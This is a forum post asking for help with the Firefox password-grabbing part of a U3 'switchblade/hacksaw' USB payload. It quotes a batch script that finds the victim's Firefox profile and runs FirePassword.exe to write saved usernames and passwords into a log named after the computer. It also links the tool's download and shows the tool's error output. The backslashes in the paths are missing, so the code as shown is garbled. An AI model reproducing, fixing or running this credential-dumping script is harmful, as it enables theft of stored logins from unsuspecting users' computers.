Fire Fox Password Grabber Problems

iyeman

Hello All.

I am pieceing together my u3 switchblade/hacksaw combo and am getting an error with the firefox password grabbiing portion. I am using the following code from the wiki

set RtD=%CD%

cd /D "%appdata%MozillaFirefoxProfiles" >nul

set PROFILE=

for /D %%i in (*) do set PROFILE=%%i

cd /D %RtD% >nul

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

Echo *********[Dump Firefox PW]********** >> WIPdump%computername%%computername%.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

.FirePassword.exe "%appdata%MozillaFirefoxProfiles%PROFILE%" >> WIPdump%computername%%computername%.log

but whenever I run it on my test pcs I get the following error message in the log file

*********[Dump Firefox PW]**********

FirePassword (Ver 1.7) : Firefox Username & Password List Decryptor

by Nagareshwar Y Talekar

Failed to open the signon file C:Documents and SettingsAdministratorApplication DataMozillaFirefoxProfiles9xjfnxuq.default/signons.txt

I have http://www.hak5.org/packages/files/FirePassword.exe in the correct folder according to the wiki and appears to be running just not accessing the files. Both test pcs are logged in as Admin. One is zp home and 1 is xp pro both have latest version of firefox.

Any ideas asto what my issue may be?